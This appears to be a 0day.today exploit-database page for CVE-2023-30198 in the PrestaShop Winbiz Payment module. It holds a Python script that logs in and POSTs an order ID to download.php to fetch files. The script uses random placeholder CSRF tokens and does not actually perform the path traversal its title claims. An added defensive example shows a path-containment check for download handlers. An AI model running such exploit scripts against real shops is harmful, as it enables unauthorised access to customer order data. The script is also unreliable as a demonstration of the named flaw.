0day.today - Biggest Exploit Database in the World.
PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
Security Risk: Medium
```python
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import random
import string

import requests

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the front-office login page
login_url = base_url + "/authentication.php"

# The credentials of the account used to log in
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# Random 32-character string sent as "csrf_token". The script never fetches a
# real token from the login form; this value is random filler, exactly as in
# the original exploit.
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# POST to the login page to authenticate; the Session object keeps whatever
# cookies the server sets and replays them on the next request
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for the download request (they are already kept on
# `session`; the explicit copy is retained from the original)
session_cookies = session.cookies.get_dict()

# Second random placeholder token for the download request
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# POST to download.php to fetch the order PDF by order ID
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)
```

# 0day.today [2024-06-28] #
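The title classifies the issue as CWE-22 (a pathname not limited to its intended directory) in a download handler, but the page does not show how download.php maps its parameter to a file on disk. The block below is an added example, not code from the Winbiz module, from PrestaShop or from the exploit above: it puts the weak pattern (concatenate user input onto a base directory) beside the containment check a download endpoint should perform, and runs both over constructed requests in a throwaway directory tree. The directory layout, file names and the filename-style parameter are assumptions chosen to illustrate the check.

```python
"""Containment check for a file-download handler (CWE-22).

Added example; not the Winbiz module's download.php. The tree built in demo()
is constructed for illustration.
"""
import os
import tempfile
from pathlib import Path


def unsafe_path(downloads_dir: str, user_supplied: str) -> str:
    """The weak pattern: join user input onto the base directory and serve it.

    '..' segments are never rejected, and os.path.join drops `downloads_dir`
    entirely when `user_supplied` is absolute, so both escape the directory.
    """
    return os.path.join(downloads_dir, user_supplied)


def safe_path(downloads_dir: str, user_supplied: str) -> str:
    """Resolve the request and refuse anything that lands outside downloads_dir.

    realpath() collapses '..' and follows symlinks, so a link planted inside
    the directory that points outside it is caught too. commonpath() is the
    containment test; a plain startswith() would accept '/srv/downloads_evil'
    as being inside '/srv/downloads'.
    """
    base = os.path.realpath(downloads_dir)
    candidate = os.path.realpath(os.path.join(base, user_supplied))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("path escapes downloads directory: %r" % user_supplied)
    if not os.path.isfile(candidate):
        raise FileNotFoundError(user_supplied)
    return candidate


def demo() -> dict:
    """Build a constructed tree and compare both resolvers on typical requests.

    Returns {label: (unsafe_would_serve, safe_outcome)} where safe_outcome is
    'served', 'rejected' or 'not found'.
    """
    root = tempfile.mkdtemp()
    downloads = os.path.join(root, "downloads")
    os.makedirs(downloads)
    # Constructed sample data: one legitimate PDF inside the directory and one
    # sensitive file outside it, plus a symlink inside pointing at the latter.
    Path(downloads, "order_1234.pdf").write_bytes(b"%PDF-1.4 constructed sample\n")
    Path(root, "settings.inc.php").write_text("<?php // constructed secret outside downloads\n")
    os.symlink(os.path.join(root, "settings.inc.php"), os.path.join(downloads, "link.pdf"))

    requests_ = {
        "legit": "order_1234.pdf",
        "dotdot": "../settings.inc.php",
        "symlink": "link.pdf",
        "absolute": os.path.join(root, "settings.inc.php"),
        "missing": "order_9999.pdf",
    }
    results = {}
    for label, req in requests_.items():
        unsafe_would_serve = os.path.isfile(unsafe_path(downloads, req))
        try:
            safe_path(downloads, req)
            outcome = "served"
        except PermissionError:
            outcome = "rejected"
        except FileNotFoundError:
            outcome = "not found"
        results[label] = (unsafe_would_serve, outcome)
    return results


if __name__ == "__main__":
    for label, (unsafe_hit, outcome) in demo().items():
        print("%-9s unsafe serves: %-5s  safe: %s" % (label, unsafe_hit, outcome))
```

The order of operations matters: canonicalize first, then compare, then check existence. Comparing before realpath() lets `..` and symlinks through; checking existence before containment turns the handler into a file-existence oracle for paths outside the directory. Where the endpoint is keyed by an ID rather than a filename (as the exploit's `id_order` suggests), the same principle applies one level up: look the ID up in the database and build the path from the stored record, never from the request.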